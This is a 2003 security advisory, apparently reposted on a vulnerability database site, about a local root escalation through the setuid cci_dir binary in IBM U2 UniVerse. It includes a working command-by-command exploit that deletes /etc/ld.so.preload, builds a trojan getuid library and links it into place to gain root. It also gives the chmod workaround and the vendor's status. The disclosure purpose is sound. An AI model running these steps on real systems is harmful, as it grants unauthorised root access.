Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormStrategic Reconnaissance TeamPACKETSTORM:31367
HistoryJul 17, 2003 - 12:00 a.m.

SRT2003-07-07-0831.txt

2003-07-1700:00:00
Strategic Reconnaissance Team
packetstormsecurity.com
34
JSON
`Secure Network Operations, Inc. http://www.secnetops.com  
Strategic Reconnaissance Team [email protected]  
Team Lead Contact [email protected]  
  
  
Our Mission:  
************************************************************************  
Secure Network Operations offers expertise in Networking, Intrusion   
Detection Systems (IDS), Software Security Validation, and   
Corporate/Private Network Security. Our mission is to facilitate a   
secure and reliable Internet and inter-enterprise communications   
infrastructure through the products and services we offer.   
  
  
Quick Summary:  
************************************************************************  
Advisory Number : SRT2003-07-X-XXXX  
Product : IBM U2 UniVerse  
Version : Version <= 10.0.0.9 (DGUX = 7.3.2.1)   
Vendor : http://ibm.com/software/data/u2/universe/  
Class : local  
Criticality : High (to UniVerse servers with local users)   
Operating System(s) : DGUX, Linux (other unix based?)  
  
  
High Level Explanation  
************************************************************************  
High Level Description : cci_dir creates hard links as root.   
What to do : chmod -s /usr/ibm/uv/bin/cci_dir  
  
  
Technical Details  
************************************************************************  
Proof Of Concept Status : No PoC needed for this issue.   
Low Level Description :   
  
UniVerse is an extended relational database designed for embedding in   
vertical applications. Its nested relational data model results in   
intuitive data modeling and fewer resulting tables. UniVerse provides   
data access, storage and management capabilities across Microsoft®  
Windows® NT, Linux and UNIplatforms  
  
A legacy program aparantly left over from UniVerse's support for the CCI   
(Concurrent Controls Inc) Operating System can provide a normal user   
with root access. cci_dir makes a call to link() while running as root.  
This can allow an attacker to place text into any file that does not yet  
exist. cci_dir will also call unlink() on the attackers file of choice  
again while running as root. The combination of these issues can provide  
root in a number of ways. The only limitation on the exploitation of   
this issue would be the use of multiple partitions. As H D Moore of   
http://digitaldefense.net pointed out to me, linking across partitions   
will result in a failure in the link() call.   
  
link("/etc/passwd", "/tmp/test") = -1 EXDEV (Invalid cross-device link)  
  
The above limitation by no means stops potential exploitation of this   
issue. Some of the attackers options include placing "+ +" in a .rhosts  
file, unlinking and recreating the shadow or password files or even the  
trojaning of shared library files.   
  
The results of this issue are demonstrated below.  
  
[root@vegeta bin]# ls -al ./cci_dir  
-rwsr-x--x 1 root bin 10328 Apr 3 21:57 ./cci_dir  
  
[root@vegeta bin]# ltrace ./cci_dir USER_SUPPLIED USER_SUPPLIED2  
...  
link("USER_SUPPLIED", "USER_SUPPLIED2") = -1  
fprintf(0x4212ef80, "Was unable to link files\n") = 25  
  
[root@vegeta bin]# touch a  
[root@vegeta bin]# ltrace ./cci_dir a b  
...  
link("a", "b") = 0  
unlink("a") = 0  
  
Lets see how the above can lead to a root compromise.   
  
My first target would be /etc/ld.so.preload. We can not link to a file   
that already exists so lets have it unlink()'d for us.   
  
[kf@vegeta kf]$ ls -al /etc/ld.so.preload  
-rw-r--r-- 1 root root 0 Jul 7 20:03 /etc/ld.so.preload  
  
[kf@vegeta kf]$ /usr/ibm/uv/bin/cci_dir /etc/ld.so.preload isgone  
Was unable to unlink file isgone/..  
  
[kf@vegeta kf]$ ls -al isgone  
-rw-r--r-- 1 root root 0 Jul 7 20:03 isgone  
  
[kf@vegeta kf]$ ls -al /etc/ld.so.preload  
ls: /etc/ld.so.preload: No such file or directory  
  
Next lets prepare for a shared library attack on /etc/ld.so.preload.  
[kf@vegeta kf]$ cat > oops.c  
int getuid(void)  
{  
return(0);  
}  
^C  
  
[kf@vegeta kf]$ gcc -c -o oops.o oops.c  
[kf@vegeta kf]$ ld -shared -o oops.so oops.o  
[kf@vegeta kf]$ cat > owned  
/home/kf/oops.so  
^C  
  
Next we cause cci_dir to hardlink to our trojan ld.so.preload file.  
[kf@vegeta kf]$ /usr/ibm/uv/bin/cci_dir owned /etc/ld.so.preload  
Was unable to unlink file /etc/ld.so.preload/..  
  
You should note that we now have an ld.so.preload file.  
  
[kf@vegeta kf]$ ls -al /etc/ld.so.preload  
-rw-rw-r-- 1 kf kf 18 Jun 27 18:41 /etc/ld.so.preload  
  
[kf@vegeta kf]$ cat /etc/ld.so.preload  
/home/kf/oops.so  
  
Now you can simply take root. (note you do NOT type a password for su)  
  
[kf@vegeta kf]$ su -  
[root@vegeta root]# id  
uid=0(root) gid=0(root) groups=0(root)  
  
  
Patch or Workaround : chmod -s /usr/ibm/uv/bin/cci_dir  
  
Vendor Status : The IBM U2 staff will have this issue resolved   
in a future release of IBM U2. Patches may also be supplied on a per   
client basis at IBM's disgression.   
  
Research and testing by the IBM staff has confirmed that cci_dir is no longer   
required for current UniVerse platform support. It will be removed from future   
UniVerse releases. Customers may also remove it from their systems to mitigate   
this vulnerability.  
  
Bugtraq URL : to be assigned  
  
------------------------------------------------------------------------  
This advisory was released by Secure Network Operations,Inc. as a matter  
of notification to help administrators protect their networks against  
the described vulnerability. Exploit source code is no longer released  
in our advisories. Contact [email protected] for information on how  
to obtain exploit information.  
  
  
`
JSON